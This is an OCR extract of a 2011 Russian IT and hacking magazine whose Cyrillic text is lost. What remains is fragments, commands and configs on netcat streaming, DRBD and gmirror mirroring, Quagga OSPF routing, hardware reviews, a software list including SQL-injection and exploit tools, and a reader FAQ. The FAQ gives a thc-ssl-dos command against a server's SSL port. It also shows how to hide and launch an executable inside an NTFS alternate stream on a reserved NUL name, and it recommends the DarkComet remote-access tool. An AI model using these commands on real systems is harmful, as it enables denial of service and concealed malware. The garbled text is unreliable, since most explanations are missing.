ifconfig tap0 192.168.0.2 netmask 255.255.255.0
route add default 192.168.0.1

4. ,
NAT:
# sysctl net.inet.ip.forwarding=1
# ipfw add nat 123 all from tun0 to any

MAC-
:

deluge,

-.
:
# vi /usr/local/bin/autotorrent.sh
#!/bin/bash
# ( ),
#
IDLE=120000
#
STOPCMD="transmission-remote -S"
#
STARTCMD="transmission-remote -s"
# STOPCMD="deluge-console pause \*"
# STARTCMD="deluge-console resume \*"
STOPPED="yes"
while true; do
if [ 'xprintidle' -gt $IDLE ]; then
if [ $STOPPED = "yes" ]; then
$STARTCMD
STOPPED="no"
fi
else
if [ $STOPPED = "no" ]; then
$STOPCMD
STOPPED="yes"
fi
fi
sleep 60
done

STOPCMD STARTCMD
.
-. , deluge ,
deluged.
~/.config/autostart:
# ln -s /usr/bin/deluged ~/.config/autostart

# hccontrol -n ubt0hci inquiry

:
trickle, , -

12 /155/ 2011

ALSA
arecord,
. ,

127

SYN/ACK

, , . ,
netcat,
. , VoIP-
:
-1$ netcat -l -p 5555 | aplay
-2$ arecord | netcat IP--1 5555

-2 -1. .
, .
,
,
.
, ALSA , :
$ vi .asoundrc
pcm.copy {
type plug
slave {
pcm hw
}
route_policy copy
}

arecord netcat:
-2 $ arecord -D copy | netcat IP--1 5555

RAID1

RAID. ,
.
, RAID- , RAID-
.
, , .
Linux/BSD-, , , ,
.
, ,
.
RAID-
, , RAID (, ,
IDE ),
(

). :

. ,
,
!
. 2009
Linux DRBD (Distributed
Replicated Block Device),
, , ,
-, , .
,
Linux.

128

, :
1. . ,
.
fdisk/cfdisk GNU Parted. ,
, , .
, ,
: sda5 192.168.0.1 sda7 192.168.0.2.
, ,
. DRDB ,

, master-.
, master- ,
.
2. ,
. ,
: shared-secret
, disk
, address .
:
# vi /etc/drbd.conf
global { usage-count no; }
common { syncer { rate 100M; } }
resource r0 {
protocol C;
startup {
wfc-timeout 15;
degr-wfc-timeout 60;
}
net {
cram-hmac-alg sha1;
shared-secret "";
}
on node1 {
device /dev/drbd0;
disk /dev/sda5;
address 192.168.0.1:7788;
meta-disk internal;
}
on node2 {
device /dev/drbd0;
disk /dev/sda7;
address 192.168.0.2:7788;
meta-disk internal;
}
}


DRBD-.
drbd-utils drbd8-utils.
3.
drbdadm:
# drbdadm create-md drbd0

.
DRBD-:
# /etc/init.d/drbd start

12 /155/ 2011

DRBD-

(,
drbdadm up all),
DRBD master-, ,
.

/etc/gg.exports -
, :

4. master- DRBD, :

, ,
- ggate, :

192.168.0.2 RW /dev/ad0s1d

# drbdadm primary all


# ggated

.
/proc/drbd.
5. .
DRBD- :
# mkfs.ext4 /dev/drbd0
# mount /dev/drbd0 /mnt

, /mnt,
.
, master- . ,
.
FreeBSD .
GEOM- ggate, , GEOM- gmirror
RAID1.
, DRBD Linux.
, ,
.
DRBD, . , .
GEOM-:
# kldload geom_mirror
# kldload geom_gate

, ggate
, .

12 /155/ 2011

-
:
# ggatec create 192.168.100.2 /dev/ad0s1d

, ( ,
ggate0). ,
- ( /dev/ad0s1d) /dev/ggate0
RAID1- gmirror:
# gmirror label -v -b prefer gm0 ggate0 ad0s1d

, .
, : ) , )
prefer .
/ :
# fsck -t ufs /dev/mirror/gm0
# mount /dev/mirror/gm0 /mnt

,
UNIX-,
man-. ,
! z

129

SYN/ACK
SYN/ACK

grinder
grinder (grinder@tux.in.ua)





,

.

.

,


.
.

130
0130

VIDEO
BIRD
bird.network.cz.
C Quagga quagga.net.

Quagga quagga.
net/docs.
RFC
ietf.org.

WARNING

Quagga


CONFIG_NETLINK,
CONFIG_RTNETLINK
CONFIG_IP_MULTICAST.

INFO
Quagga

.
,
,

.
/usr/
share/doc/quagga/
tools

LINUX

: ,
() ?
?
? , -.
,
cron IP .
c .
iproute2. , , ,
( 192.168.0.2 192.168.1.2 ,
192.168.0.1 192.168.1.1 ):
#echo "1_ISP" >> /etc/iproute2/rt_tables
#echo "2_ISP" >> /etc/iproute2/rt_tables
#ip route add 192.168.1.0/24 dev eth0 src \
192.168.1.2 table 1_ISP
#ip route add default via 192.168.1.1 table 1_ISP
#ip route add 192.168.0.0/24 dev eth2 src 192.168.0.2 \
table 2_ISP
#ip route add default via 192.168.0.1 table 2_ISP
#ip rule add from 192.168.1.2 table 1_ISP
#ip rule add from 192.168.0.2 table 2_ISP
#ip route add default scope global nexthop via \
192.168.1.1 dev eth0 weight 1 \
nexthop via 192.168.0.1 dev eth2 weight 1

,
. ,
, ,
. :
RIP, OSPF, BGP, IGRP, EIRGP, IS-IS .

, ,
. - , , . :
RIP (Routing Information Protocol) BSD
.

,
.
(, . hope).
30 , .
(next hop)
. RIP . 15.
180 ,
16 . ,
.
RIPv2 (RFC 2453) RIPng ( IPv6). 520/UDP.

12
12 /155/
/155/ 2011
2011

OSPF (Open Shortest Path First) , (link-state technology)



( ).

, . DR (Designated router)
BDR (Backup Designated Router).
.
89/IP. RFC 2328 (
RFC ).
EIGRP (Enhanced Interior Gateway Routing Protocol) IGRP
Cisco. , , . OSPF ,
.
BGP (Border Gateway Protocol, 179/TCP)
(
IS-IS), (AS, Autonomous
System). ,
IP,
.
,
, RIP, OSPF,
BGP. ,
RIP. *nix. .
. , OpenBGPD/OpenOSPFD (openbgpd.org)
BGPv4 OSPF OpenBSD.
3.5/3.7.
, IP-.

debian.conf

. Quagga
,
zebra (core daemon),
,
API.
.

vtysh,
Quagga. vtysh Cisco CLI,
, Cisco, ,
.
Quagga Linux, *BSD OpenSolaris. Ubuntu
:
$ sudo apt-get install quagga

# vi /etc/sysctl.conf
net.inet.ip.forwarding=1

/etc/ospfd.conf
ospf6d.conf, .
*nix ( Linux)
, :
BIRD (BIRD Internet Routing Daemon, bird.network.cz) RIPv2,
BGPv4, OSPFv2/v3,
.
Quagga (quagga.net) , BGPv4 v4+, RIP v1/v2/v3, RIPng, OSPF
v2/v3 IS-IS.
,
.
, .

QUAGGA UBUNTU LINUX


GNU Zebra,
2005 ,
Zebra-pj. Quagga
(Route Reflectors).
BGP,
(speaker) . RR ,
, DR BDR OSPF,

12
12 /155/
/155/ 2011
2011

, . ,
.
/etc/quagga. ,
,
: quagga.net/doc. (
) /etc/quagga/daemons.
. OSPF:
$ sudo nano /etc/quagga/daemons
zebra=yes
ospfd=yes
bgpd=no
# OSPF IPv6
ospf6d=no
ripd=no
# RIPng IPv6
ripngd=no
isisd=no

yes no ,
: 1 ( )10 ( ) 0 ().
TCP-, , /etc/services:
$ grep zebra /etc/services

, Quagga
.
131
0131

SYN\ACK
SYN/ACK

grinder (grinder@tux.in.ua)

,
, terminal mode.
,
/etc/quagga/debian.conf ( /etc/
init.d/quagga), '--keep_kernel'
'--retain'.
$ sudo nano /etc/quagga/debian.conf
vtysh_enable=yes
zebra_options=" --daemon -A 127.0.0.1 -u quagga \
--keep_kernel --retain"
ospfd_options=" --daemon -A 127.0.0.1 -u quagga"

'--daemon'
IP-, (-A 127.0.0.1).
vtysh_enable
. ,
, '-u quagga'.
:

, Quagga

$ grep quagga /etc/passwd


quagga:x:117:128:Quagga routing suite,,,:/var/run/
quagga/:/bin/false

, .


OSPF
/usr/share/doc/quagga/examples
, :
$ sudo cp v /usr/share/doc/quagga/examples/zebra.conf.sample \
/etc/quagga/zebra.conf
$ sudo cp v /usr/share/doc/quagga/examples/ospfd.conf.sample \
/etc/quagga/ospfd.conf
$ sudo cp v /usr/share/doc/quagga/examples/vtysh.conf.sample \
/etc/quagga/vtysh.conf

:
list

$ sudo chown quagga:quagga /etc/quagga/zebra.conf


$ sudo chown quagga:quagga /etc/quagga/ospfd.conf

Quagga.
$ sudo service quagga restart
.....
Starting Quagga daemons (prio:10): zebra ospfd.

enable password pass2


!
interface lo
interface eth0
!
! bandwidth cost
! /

,
. ps aux | grep quagga netstat-ant ,

.
,
. ,
vtysh. !
#. zebra.conf:

multicast
!
! ( )
ip route 0.0.0.0/0 11.22.33.44
! , /var/log/quagga
! / quagga:quagga

$ sudo nano /etc/quagga/zebra.conf


!
hostname Router1
! vty
password pass1
!

ospfd.conf
.

132
0132

log file /var/log/quagga/zebra.log

$ sudo nano /etc/quagga/ospfd.conf


!
router ospf

12
12 /155/
/155/ 2011
2011

! ospf
area 0
network 192.168.0.0/24 area 0
! network 172.10.10.0/16 area 1
log file /var/log/quagga/ospfd.log

. telnet vtysh.
:
$ sudo vtysh

.
, list. :
# configure terminal

.
, ,
,
.
(config)# service password-encryption
(config)# exit
;
# show memory
# write memory
Integrated configuration saved to /etc/quagga/Quagga.conf [OK]

, ,

. Quagga.conf, ,
. show startupconfig . .
# show ip route
Codes: K - kernel route, C - connected, S - static,
R - RIP, O - OSPF, I - ISIS, B - BGP,
> - selected route, * - FIB route
S 0.0.0.0/0 [1/0] via 192.168.10.2, eth0
K>* 0.0.0.0/0 via 192.168.10.2, eth0
C>* 127.0.0.0/8 is directly connected, lo
K>* 169.254.0.0/16 is directly connected, eth0

OSPF

C>* 192.168.0.0/24 is directly connected, eth0

, .
(IP 192.168.1.2):
(config)# ip route 10.0.0.0/8 192.168.1.2

,
OSPF.
, .
(config)# router ospf
; ID , IP
(config-router)# ospf router-id 192.168.0.1
;
(config-router)# redistribute connected
(config-router)# redistribute static
;
(config-router)# neighbor 192.168.1.2
(config-router)# neighbor 192.168.2.2
(config-router)# default-information originate
(config-router)# end
# write file


( ), default-information originate.
, static route, .
.
, router-id neighbor.
.
#
#
#
#
#

show
show
show
show
show

ip ospf database
ip ospf neighbor
ip ospf database
interface
debugging ospf

write memory

12
12 /155/
/155/ 2011
2011

. , ,
, . , . z
133
0133

FERRUM

QUADRATISCH.
PRAKTISCH. GUT

GIGABYTE GA-H61N-USB3
ATX , , ,
, .

. Micro-ATX,
.
Mini-ITX. . , GIGABYTE GA-H61N-USB3.

,
Mini-ITX Intel
H61 Express. -, .
GIGABYTE GA-H61N-USB3
, , PEG ( SLI
CrossFireX ). . ,
DDR3
1333 , !
, . ,
PCI Express 16
, . Intel
P67 Express Intel Z68 Express.
PCI Express, USB 2.0 SATA II.
, USB 3.0 SATA 3.0 .

-
, ,
SATA
Intel H67 Express. ,

. ,
Intel H61 Express RAID'. ,
Intel

. Intel Sandy Bridge


Intel H61 Express DIMM,
SATA II PCI Express x16.
,
. .

PCI Express x16 .
,
, ,
Wi-Fi- -
, . , GIGABYTE GA-H61N-USB3

. ,
, ,
,
, -
.

. , GIGABYTE GA-H61N-USB3
.
HDMI 1.4 , 3D. Intel Sandy Bridge
HD-.
USB- (
USB 3.0), S/PDIF eSATA .
.
SATA-. , SATA II,
SATA 3.0. -, .

134


SSD,
. ,
, . .
, HTPC
SATA II,
23
, Dual BIOS . , GIGABYTE GA-H61N-USB3
,
RAID- .
. ,
.
DIMM, PCI Express x16.
,
BIOS ( Smart 6)
.


,
, , - .
, Super Pi 1.5 XS
,
wPrime 32 ,
Intel Sandy Bridge. WinRAR
CINEBENCH , ,
HD-.
, , Intel H61
Express ,

.
.


,
GIGABYTE GA-H61N-USB3 . ,

, GIGABYTE Super 4 GIGABYTE
Ultra Durable 3. ,
GIGABYTE GA-H61N-USB3
, , :
HTPC. z

12 /155/ 2011

Quadratisch. Praktisch. Gut

3000
.


,
Mini-ITX (170 170 )
.
Nano-ITX (120 x 120 ) PicoITX (100 x 72 ). ,
GIGABYTE GA-H61N-USB3 .

12 /155/ 2011

: LGA1155
: Intel H61 Express
: DDR3, 8001333
: 1x PCI Express x16
: 2x SATA II
: Ethernet, 10/100/1000 /
: 7.1 CH, HDA, Realtek
ALC889
: 1x DVI, 1x
D-Sub, 1x HDMI, 2x USB 3.0, 4x USB 2.0,
1x eSATA, 2x S/PDIF, 1x RJ-45, 3
: Mini-ITX, 171 171

:
Intel Core i5-2400, 3,1
:
GIGABYTE GA-H61N-USB3
: Kingston
KVR1066D3N7K2/2G, 2x 1
SSD: Corsair Force F120,
120
: HIPER TYPE
K1000, 1000
: Windows 7

Super Pi 1.5 XS 1m: 12,276


wPrime 1.55 32m: 10,86 c
CINEBENCH 11.5: 4,12 pts
WinRAR: 2987 /c

135

FERRUM

,


EDIFIER MP250
1300
.

Edifier, ,
.

:
Edifier MP250 . ,
, , .
!


Edifier MP250 ,
. , .
, ,
,

. Edifier MP250
,
.

USB mini-USB, jack-tojack .
.
,

. , Edifier MP250 :
.

:
: RMS 2 2
/: 75
- -: 4 1,25
-: , 3 1,25
: USB, 3,5 jack
: USB,
: 261 36 44
: 0,33

USB-.
. USB.
3,5
. ,
,
USB,
.
,

,
. ,
,
. ,
. ,
.

Edifier MP250
. Edifier MP250 -

,
.

136


. Edifier MP250 .

, .
( , )
.
Edifier MP250

. ,

.

-
,
Edifier MP250. ,
, . ,
? ,

. z

12 /155/ 2011

>Net
BenderConverter
Colasoft Packet Player 1.2
Device Doctor 2.0
digsby
Echo Mirage 1.2
Feed Notifier 2.5
FVD Suite 2.6.8
Google.mE 1.50
inSSIDer 2.0.7
MetroTwit
NetSpeedMonitor 2.5.4.0
NFReader 1.4.1
Odysseus 2.0.0.84
ooVoo 3.0.4
RevoluTV 2.5

>Multimedia
AIMP 3.00 Beta 5
DeepBurner 1.9
DipTrace 2.2
Evernote 4.5.1
Foxit Reader 5.1
GeeTeeDee 0.1.274
GIMPshop 2.2.8
Greenshot 0.8.1
IrfanView 4.30
PicPick 3.0.9
Virtual DJ 7.0.5
Virtual Piano 4.0
WorldWide Telescope 3.0.5.1
Xbmc 10.1
XnConvert 1.10

>Misc
AltDrag 0.9
CollageIt
Desk Drive 1.8.2
DeskView
Dropresize
F.lux
FilerFrog 2.0
FluentNotepad
Q10 1.2.21
RandomScreensaver 2.0.1
Scrybe 1.6.4
TaskDock
Wheel Here 1.4.2
Windows Themes Installer 1.1
YoWindow 2.0

>>WINDOWS
>Development
BinVis
CollabNet Subversion Edge 2.1.1
Crack.NET 1.2
Dependency Walker 2.2
Expresso 3.0
HttpWatch 7.2
Immunity Debugger 1.83
jQueryPad
Parrot 3.9.0
Scapy 2.2.0
SQLiteStudio 2.0.19
VisualSVN Server 2.5
WebStorm 3.0
WinAppDbg 1.4

>Devel
Dojo 1.6.1
Fltk 3.0.x-r9155
Fpdf 1.7
Glade 3.10.2
Gwt 2.4.0

>>UNIX
>Desktop
Audacity 1.3.13-beta
Blender 2.60a
Darktable 0.9.2
Digikam 2.2.0
Dvdstyler 2.0
Gcad3d 1.70
Inscape 0.48.2
Kmplayer 0.11.3a
Luckybackup 0.4.6
Midnight commander 4.8.0
Peazip 4.1
Picasa 3.0
Postr 0.12.4
Seahorse 2.28.1
Soundkonverter 1.2.0
Sox 14.3.2
Xneur 0.14.0
Zim 0.53

>System
Chameleon Shutdown 1.1.1.30
Disk Space Fan
Drive Backup 0.0604
HD Speed 1.7.1.90
IObit Toolbox 1.2
LockNote 1.0.5
MenuMaid 1.0.1
MonitorES 1.0.1
NirLauncher
QRM Plus Manager 1.0
RecycleBinEx 1.0.5.530
Soluto
Switcher 2.0.0
SystemMonitor 1.64
WinBubble 2.0
WindowMenuPlus 1.14

Sql-Injection:
MySqloit 0.1
SQID 0.3
SQL Power Injector 1.2
Sqlbftools 1.2
SQLBrute
Sqlmap 0.9
SQLNinja 0.2.6

>Security
AppAdmin 1.1.0
BeEF 0.4.2.10
Free File Wiper 0.7d
Freeraser 1.0.0.23
Secret Disk 1.35
Telemachus 1.0
Tor 0.2.2.34
USB Port Locked 2.0
Volatility 2.0
WinLockr
WipeFile 2.1.1

>Server
Apache 2.2.21
Asterisk 1.6.2.20

>Security
Clamav 0.97.3
Ctunnel 0.6
Gnutls 3.0.5
Nikto 2.1.4
Pac 3.3.5
Passwordsafe 0.6.0beta
Pdfcrack 0.11
Saferhoneypot 20111027
Slackfire 0.65.e
Snare 2.0.0
ARMu 0.17b
DOM Snitch v0.725
ExaScan
Exploit Pack
findmyhash 1.1.2
hash-identifier 1.1
Hatkit Proxy 0.5.1
L0phtCrack v6.0.12c
Ostinato v0.5
PacketFence 3.0.2
Watcher 1.5.4
WiFuzz
xSQLScanner 1.2

>Net
Amule 2.3.1rc2
Bareftp 0.3.9
Bitlbee 3.0.3
Blam 1.8.7
Chrome 13.0.782
Drivel 3.0.3
Fatrat 1.1.3
Gnugk 2.3.5
Ifolder 3.8.0.3
Opera 11.52
Peerguardian 2.1.3
Qbittorrent 2.9.2
Qwit 1.1-pre2
Remmina 0.9.3
Skype 2.2.0.35
Smb4k 0.10.90
Sylpheed 3.1.2
Uget 1.8.0

>Games
Rigsofrods 0.38.64
Sauerbraten 20100728
Simutrans 110.0.1

Jfreechart 1.0.17
Jqueryui 1.8.16
Juce 1.53
Lazarus 0.9.30.2rc2
Libsdl-android
Matplotlib 1.1.0
Movicon 1.0b
Poedit 1.4.6.1
Scintilla 2.29
Symfony 2.0.4
Tcpdf 5.9.134
Ultimatepp 3211
Wxwidgets 2.9.2

>>MAC
0xED 1.0.9
Bean 2.9.7
DragonDisk 0.92
Eddie 2.1
Firefox 8.0
ImageBurner 2.0
KeyCue 6.0
Letterbox 0.24b9
LiteSpeed Web Server 4.1.7
Opera 11.52
OS Track
Palringo 4.0.1
Punto Switcher 3.2.5
Que 1.3.1
Raven 0.6
TeamViewer 6.0.10548
Tunatic 1.1
uTorrent 1.5.11
VirtualBox 4.1.4

>X-distr
Fedora 16 Desktop Edition
Puppy 5.3
Slce 6.1
Ubuntu 11.10

>System
2clickupdate 6.0
Ajenti 0.6.0
Bluez 4.96
Checkinstall 1.6.2
Collectl 3.6.0
Cryptmount 4.2.1
Fslint 2.42
Grub 1.99
Kml 3.1_001
Nilfs-utils 2.1.0-rc2
Robinhood 2.3.2
Smartmontools 5.42
Squashfs 4.2
Sysstat 10.0.2
Testdisk 6.12

Bind 9.8.1
Cups 1.5.0
Dhcp 4.2.3
Dovecot 2.0.15
Freeradius 2.1.12
Lighttpd 1.4.29
Minidlna 1.0.22
Mysql 5.5.17
Nsd 3.2.8
Openldap 2.4.26
Openvpn 2.2.1
Postfix 2.8.6
Postgresql 9.1.1
Samba 3.6.1
Sendmail 8.14.5
Snort 2.9.1.2
Squid 3.1.16
Syslog-ng 3.3.1
Vsftpd 2.3.4

12(155) 2011



i)0V

.!4

p lmazh
pq_lc_oqimcglb_



_q_igl_
nmj{fma_qdjdh
vdodfo_pwgodlg~
&)2%&/8



glqdoa{}p
pmfc_qdjdk
.').8





odimkdlcma_ll_~




-'*5.11)1*/'0

 


8889",&136

  




!
800
!

191
2200 . ( )
23% ,
(250 )
30 ,
31 ,
31 .

8.5
DVD

!
!
,
, :


+ DVD

Total Football
+ DVD

DVD
+ DVD

DVDXpert

+ DVD

Smoke


,

.
PC
+ 2 DVD

+ DVD

T3

Digital Photo
+ DVD

+ DVD

12 2200 .
6 1260 .
,
!

.
: 210

GOOGLE CHROME 030

x 09 (152) 2011

LULZSEC
09 (152) 2011

082

LULZSEC / FOX NEWS

1. , , shop.glc.ru.
2. .
3.
:
e-mail: subscribe@glc.ru;
: (495) 545-09-06;
: 115280, ,
. , 19, ,
5 ., 21,
, .

500 .



WINDOWS 7

PHPMYADMIN
064

ANDROID 070
152

,
JAVASCRIPT 050

:
, ,
FOX NEWS



+ + 2 DVD:
162
( 35% , )

!
,
.

12 3890 (24 )
6 2205 (12 )

.
,

? info@glc.ru 8(495)663-82-77 ( ) 8 (800) 200-3-999 (


, , ).

UNITS / FAQ UNITED

ant

FAQ United

FAQ@REAL.XAKEP.RU



ANDROID, .
- ,

?


,

.
- ,
.
Honeynet Project A.R.E (Android Reverse Engineering)

Android.

: Androguard,
Android sdk/ndk, APKInspector, Apktool,
A xmlprinter, Ded, Dex2jar, DroidBox, Jad,
Smali/Baksmali
.
A.R.E
redmine.
honeynet.org/projects/are/wiki.

,

,
HIGHLOAD?

,
,
-,
, ,
,
.
.
The Hackers Choice DDoS, SSL-.
thc-ssl-dos ,
SSL-
15 , .
SSL. ,

2003 ! -
:

$ ./thc-ssl-dos <IP- > 443

-


FACEBOOK?


fbpwn (code.google.com/p/fbpwn).
,

, -

.
,
,
.
,
- ,
,
.


, DNS-
.
DNS-
?

! DNS-
.
DNS.

,
DNS-. :
,
- .
DNS, iodine (code.
kryo.se/iodine).
-
iodined:

$ iodined -f -m 220 -l 1.2.3.4 -P 123


192.168.0.1 ns.abc.ru

5 : WINDOWS-

Windows-
,
.
, ,
. ,
-
.

140

,

.
Loggly (loggly.
com).
: syslog/syslog-ng
API.

Windows
syslog. ,
. ,

, ,

API loggly.

12 /155/ 2011

FAQ UNITED

:
f , ;
m mtu
MTU ( DNS-);
l IP
IP, ( ,
DNS-,
);
P .


-

NTFS?
,

ADS.

C:\temp>dir /r C:\temp
Directory of C:\temp
.
..
5 NUL
1 File(s)
5 bytes

,
,
iodine:

C:\temp>streams C:\temp
Streams v1.56 - Enumerate alternate
(C) 1999-2007 Mark Russinovich
NTFS data streams
No files with streams found.



.

,
- (CON,
PRN, AUX, NUL, COM1, LPT1 ..),

dir /R
streams.exe .
, ,
\\?\ . ,
ADS:

$ iodine -P 123 ns.abc.ru


,
,
DNS-.
DNS-, ,
.
,
Q

,

. . . -
.

?

.
.
,
WMIC:
C:\temp>wmic process call create
\\?\C:\temp\NUL:hidden_ADS.exe
Executing (Win32_Process)->Create()
Method execution successful.
Out Parameters:
instance of __PARAMETERS
{
ProcessId = 1620;
ReturnValue = 0;
};

:\temp>type C:\Windows\System32\
cmd.exe > \\?\C:\temp\NUL:hidden_
ADS.exe
:

,

,
.

:

<FilesMatch "\.(gif|jpe?g)$">
SetEnvIf Referer "^http://
([^/]*\.)?mydomain.com/" request_ok = 1
Order Allow, Deny
Allow from env=request_ok
</FilesMatch>


(GIF JPG)
, (mydomain.com). ,

NTsyslog (troy.jdmz.net/syslogwin)
,
, Windows

syslog-. ,
, syslog-.

12 /155/ 2011

,
, .


Windows-
Snare (www.intersectalliance.
com).

, , . Windows
Snare Agent.

-
Loggly .
. Graylog2 (graylog2.org)
syslog- , -
.

141

UNITS / FAQ UNITED

Apache'
.htaccess.
.

,
(2 ).

.
,
. ?

, , ,
. . . P2P, . -,
.
torrent- ( ).
, ,
, -,


.
Torrent2exe.com
.torrent
. DriverPack Solution 11 (drp.su/ru),

Torrent2exe. : 3 .

ant

(
cp1251,
, )
(
latin1).
. Sypex Dumper
(sypex.net).
, auto.

. ,
, cp1251,
. !
,
,
UTF-8.
UTF-8,
, . ,
UTF-8, UTF-8,
latin1.
MySQL
UTF-8,
latin1, MySQL latin1 UTF-8.


SSH-,
LINUX-?


SLIDESHARE,
. ?

,
, iptables.
, :


A ,
.
,
bash-,
-.
GitHub' (https://
gist.github.com/1129974).

iptables -P INPUT DROP


.
.

. ?

iptables -A INPUT -p tcp -m tcp \


--dport 22 -m state --state NEW \
-m recent --update --seconds 60 \
--hitcount 4 --rttl --name SSH \
-j DROP

,
cp1251,
latin1. . :

iptables -A INPUT -p tcp -m tcp \


--dport 22 -m state --state NEW \
-j ACCEPT

.
-
,
?
, ,
TeamViewer Chrome Remote Desktop,
Google.
DarkCometRAT (www.darkcomet-rat.com),

, -
.

, DarkComet-RAT .
,
SOCKS5,

.
:).


TOR.
(
-- ),


.


,

SOCKS, Tor-.
Torsocks (code.google.
com/p/torsocks):

$ usewithtor [application]


MySQL 4.1 ;
,
,
,
, ;

142

iptables -A INPUT -m state --state \


ESTABLISHED,RELATED -j ACCEPT
iptables -A INPUT -p tcp -m tcp \
--dport 22 -m state --state NEW \
-m recent --set --name SSH


,
/proc/net/ipt_recent/SSH.


.
, -

application ,
Tor.
. , ssh
some.ssh.com, Tor:
$ usewithtor ssh username @ some.ssh.com

,
.
SWF-, ,

.

as3-proxy
(github.com/alun/as3-proxy).
-
Apparat (code.google.com/p/apparat)

.

,
. z

12 /155/ 2011

UNITS /

+ Bluetooth=
SMS

.
SMS .
, .

1
2



. Bluetooth,

(pairing)
.
,
.

2



AT-,
SMS-
.
,
Bluetooth-.

3


.
,

.

144

4
, ,
TeamViewer.
.
.
.

11 /154/ 2011

>> coding